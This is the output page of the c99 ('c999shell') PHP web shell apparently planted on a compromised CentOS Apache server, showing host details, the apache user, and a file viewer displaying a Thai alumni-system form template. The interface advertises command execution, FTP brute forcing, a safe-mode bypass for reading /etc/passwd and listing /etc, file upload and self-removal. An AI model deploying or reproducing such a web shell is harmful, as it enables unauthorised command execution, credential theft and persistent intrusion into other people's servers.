!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis2222/application/views/ealumni/   drwxr-xr-x
Free 50.65 GB of 127.8 GB (39.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_addLevelEdu.php (6.25 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
$row_ledu 
= (isset($qu_ledu) && $qu_ledu!=NULL) ? $qu_ledu->row() : NULL;
?>
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
        <td>
            <div align="center">
            <table width="95%" border="0" cellspacing="1" cellpadding="1" bordercolor="<?php echo $table_color_even;?>" align="center">
                <tr>
                    <td align="center" class="h">ข้อมูลระดับการศึกษา</td>
                </tr>
                <tr>
                    <td colspan="2" align="right">
<?php
                    
echo anchor_popup($this->config->item("ea_folder")."basedata/ledu_popup""<img src=\"".base_url()."images/".$this->config->item("rg_folder")."picture/print.gif\" width=\"15\" height=\"14\" align=\"abmiddle\" border=\"0\" />");
?>
                    </td>
                </tr>
                <tr>
                    <td colspan="5" align="center">
                        <?php echo form_open($this->config->item("ea_folder")."basedata/ledu_insert_update", array("name" => "myform""id" => "myform"));?>
                        <table class="easzone">
                            <tr bgcolor="<?php echo $tr_color_even;?>">
                                <td class="coltd_easzone">ชื่อระดับการศึกษา (ไทย)</b></font></td>
                                <td><input type="text" name="leduName" id="leduName" value="<?php echo setValue('leduName',$row_ledu);?>" size="30" />
                                <font color="<?php echo $font_color_err;?>" size="2">*</font>
                                <br /><?php echo form_error('leduName');?>
                                </td>
                            </tr>
                            </td>
                        </tr>
                        <tr  bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_easzone"><font size="2"><b>ชื่อระดับการศึกษา (อังกฤษ)</td>
                            <td><input type="text" name="leduNameEng" id="leduNameEng" value="<?php echo setValue('leduNameEng',$row_ledu);?>" size="30" />
                            <font color="<?php echo $font_color_err;?>" size="2">*</font>
                            <br /><?php echo form_error('leduNameEng');?>
                            </td>
                        </tr>
                        <tr  bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_easzone">ชื่อย่อระดับการศึกษา (ไทย)</td>
                            <td><input type="text" name="leduAbbr" id="leduAbbr" value="<?php echo setValue('leduAbbr',$row_ledu);?>" size="30" />
                            <font color="<?php echo $font_color_err;?>" size="2">*</font>
                            <br /><?php echo form_error('leduAbbr');?>
                            </td>
                        </tr>
                        <tr  bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_easzone">ชื่อย่อระดับการศึกษา (อังกฤษ)</td>                    
                            <td><input type="text" name="leduAbbrEng" id="leduAbbrEng" value="<?php echo setValue('leduAbbrEng',$row_ledu);?>" size="30" />
                            <font color="<?php echo $font_color_err;?>" size="2">*</font>
                            <br /><?php echo form_error('leduAbbrEng');?>
                            </td>
                        </tr>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td align="center" colspan="2">
                                <input type="submit" name="add" id="add" value="ตกลง" />
                                <input type="reset" name="clear" id="clear" value="เคลียร์ข้อมูล" />
                                <input type="hidden" name="leduId" name="leduId" value="<?php echo setValue('leduId',$row_ledu);?>" />
                            </td>
                        </tr>
                    </table><?php echo form_close();?><br /></td>
                </tr>
                <tr>
                    <?php echo form_open($this->config->item("ea_folder")."basedata/ledu_search", array("name" => "searchform""id" => "searchform"));?>
                    <td align="right" colspan="5">
                    <font size="2"><b>ชื่อระดับการศึกษา (ไทย)</b></font>
                    <input type="text" name="ledusearch" value="<?php echo set_value('ledusearch');?>" />
                    <input type="submit" name="search" value="ค้นหา" />
                    <br /></font><?php echo form_error('ledusearch');?>
                    </td><?php echo form_close();?>
                </tr>
                <tr>
                    <td >
                        <table class="eaheadCol">
                            <tr>
                                <th class="seqCol"><font size="2" color="<?php echo $font_color_table;?>"><b>ลำดับ</b></font></th>
                                <th><font color="<?php echo $font_color_table;?>" size="2"><b>ชื่อระดับการศึกษา (ไทย)</b></font></th>
                                <th><font color="<?php echo $font_color_table;?>" size="2"><b>ชื่อย่อระดับการศึกษา (ไทย) </b></font></th>
                                <th class="editCol"><font color="<?php echo $font_color_table;?>" size="2"><b>แก้ไข</b></font></th>
                                <th class="deleteCol"><font color="<?php echo $font_color_table;?>" size="2"><b>ลบ</b></font></th>
                            </tr>
<?php
                        $i 
0;
                        if(isset(
$rs_ledu) && $rs_ledu->num_rows()) {
                            foreach(
$rs_ledu->result() as $row_ledu) {
                                echo 
"<tr onmouseover=\"bgColor='".$tr_color_even."'\" onmouseout=\"bgColor='".$this->config->item("rg_mouseout")."'\">";
?>
                                <td align="center"><font size="2"><?php echo $i+1;?></font></td>
                                <td class="indent"><font size="2"><?php echo $row_ledu->leduName;?></font></td>
                                <td class="indent"><font size="2"><?php echo $row_ledu->leduAbbr;?></font></td>
                                <td align="center">
                                <img class="hand" src="<?php echo base_url()."images/".$this->config->item("rg_folder")."picture/edit.gif";?>" align="absmiddle" border="0" onClick="sendPost('hidform',{'leduId':<?php echo $row_ledu->leduId;?>}, '<?php echo site_url($this->config->item('ea_folder').'basedata/ledu_input');?>')" /></td>
                                <td align="center">
                                <img class="hand" src="<?php echo base_url()."images/".$this->config->item("rg_folder")."picture/delete.gif";?>" align="absmiddle" border="0" onClick="confirmDel2({leduId:<?php echo $row_ledu->leduId;?>}, 'hidform','<?php echo site_url($this->config->item('ea_folder').'basedata/ledu_delete');?>')" /></td>
                            </tr>
<?php
                                $i
++;
                            }
                        } else {
?>
                            <tr>
                                <td colspan="5" height="22" align="center"><font size="2" color="<?php echo $font_color_err;?>">** ไม่ปรากฏรายการในฐานข้อมูล **</font></td>
                            </tr>
<?php
                        
}
?>
                        </table>
                    </td>
                </tr>
                <tr>
                    <td colspan="4" align="right"><font size="2">รวม <?php echo $i;?> รายการ</font></td>
                </tr>
            </table></div>
        <br><font color="<?php echo $font_color_err;?>" size="2"><b>หมายเหตุ : </b>* หมายถึง ต้องกรอกข้อมูลให้สมบูรณ์</font></td>
    </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0097 ]--